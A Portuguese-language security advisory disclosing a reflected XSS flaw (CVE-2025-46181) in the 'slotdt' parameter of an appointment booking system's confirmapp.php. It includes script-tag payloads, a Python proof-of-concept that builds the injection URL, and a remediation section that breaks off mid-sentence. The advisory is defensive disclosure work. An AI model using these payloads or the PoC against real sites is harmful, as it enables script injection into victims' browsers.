
Divulgação de vulnerabilidade de XSS refletido com script PoC e orientação de remediação para um sistema de agendamento de consultas online. Inclui análise de parâmetros vulneráveis e avaliação de impacto.
CVE-ID: CVE-2025-46181
Descoberto por: Shemkumar P (shemkumar.github.io)
Tipo de Vulnerabilidade: Cross-Site Scripting Refletido (XSS)
Severidade: Média
Status: Divulgado, CVE Atribuído pelo MITRE
Uma vulnerabilidade de Cross-Site Scripting Refletido (XSS) existe em um sistema público de agendamento online (v1.0), especificamente na página que lida com a confirmação de agendamentos. Um parâmetro GET não sanitiza a entrada adequadamente, permitindo a injeção de JavaScript e execução de código no navegador da vítima.
GET /confirmapp.php?slotdt=<payload>
Exemplo de Payload (Codificado):
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 Link ao vivo ocultado por razões éticas. Esta vulnerabilidade foi testada em um ambiente controlado.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
A aplicação deve:
htmlspecialchars() em PHPShemkumar P
🕸️ shemkumar.github.io
🔐 Pesquisador de Cibersegurança | Entusiasta de CTF | Repórter de CVE
⚠️ Esta publicação é apenas para uso educacional e defensivo. Testar ou explorar vulnerabilidades em sistemas que você não possui ou para os quais não tem permissão explícita é ilegal e antiético.